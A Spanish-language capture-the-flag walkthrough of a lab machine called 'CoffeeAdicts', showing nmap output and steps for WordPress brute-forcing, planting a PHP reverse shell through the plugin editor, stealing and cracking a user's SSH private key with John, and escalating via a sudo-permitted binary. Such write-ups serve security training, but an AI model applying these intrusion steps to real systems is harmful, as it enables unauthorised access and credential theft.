Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 04:16 EDT
Nmap scan report for 192.168.5.140
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:13:6a:6b:9b:e3:68:18:24:a1:de:2b:28:1e:61:5f (RSA)
| 256 c1:34:94:94:71:71:9c:6e:83:a6:be:c9:2a:1b:3f:d7 (ECDSA)
|_ 256 9a:cc:ce:ce:b8:2f:08:bb:2b:99:b6:25:3f:ec:44:61 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:5A:CB:14 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 192.168.5.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
Puerto 80
Si nos conectamos al puerto 80 nos pondra que en el archivo hosts lo editemos y añadamos el siguiente dominio....
Una vez hecho esto nos podremos meter en la pagina web mediante este dominio...
Ha simple vista en la pagina veremos un codigo de color gris codificado en Base64 o en el codigo fuente se vera mejor...
Decodificado:
Con esto tendremos una "flag"...
Gobuster
Info:
Aqui por lo que podremos ver nos aparece un wordpress por lo que haremos lo siguiente...
Info:
Aqui nos descubre un user por lo que haremos lo siguiente...
Para poder sacar la contraseña vemos que hay 2 comentarios refiriendose a que hay una contraseña publicada en el blog por ahi, por lo que sacaremos todas las palabras posibles de ese post y las volcaremos a un .txt para utilizarlo como diccionario de fuera bruta...
Info:
Vemos que nos saca un usuario y contraseña...
Por lo que nos metemos en el panel de admin para loguearnos como este usuario y poder hacernos una reverse shell...
Una vez dentro del panel de admin, nos dirigimos a la seccion de plugins de ahi nos vamos a Plugins Editor y de ahi seleccionamos alguna plantilla que este en .php para poder inyectar ahi la reverse shell en mi caso eleji el plugin llamado akisme-key una vez inyectado ese codigo le damos a activar el plugin y estando a la escucha deberia de hacernos una shell...
La sanitizamos...
Si nos vamos a la /home/ de gus encontraremos la flag...
user.txt (flag1)
Si nos vamos a la /home/ de badbyte encontramos la carpeta .ssh/ y dentro esta el id_rsa privado de ese usuario el cual podemos leer...
A parte que por lo que se puede observar tiene una contraseña configurada, por lo que haremos lo siguiente...
Nos copiamos ese id_rsa privado y nos lo pasamos a nuestro host, vamos a sacar una contraseña cifrada de la siguiente forma...
Info:
Una vez sacado esto, lo vamos a crackear...
Info:
Nos sacara una contraseña, por lo que esa password sera del usuario badbyte, nos vamos dentro de la maquina con la shell de nuestro usergus y hacemos lo siguiente...
Y metemos la contraseña que sacamos.... password
Una vez hecho esto ya seriamos ese usuario, si hacemos sudo -l con este usuario veremos lo siguiente...
Vemos que hay un archivo shell que podemos ejecutar como root, vemos que este archivo parece un binario...
Si lo ejecutamos seriamos root por lo que leemos la ultima flag...
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
password (id_rsa)
1g 0:00:00:00 DONE 2/3 (2024-05-25 05:05) 33.33g/s 402066p/s 402066c/s 402066C/s 123456..maggie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
su badbyte
Matching Defaults entries for badbyte on CoffeeAdicts:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User badbyte may run the following commands on CoffeeAdicts:
(root) /opt/BadByte/shell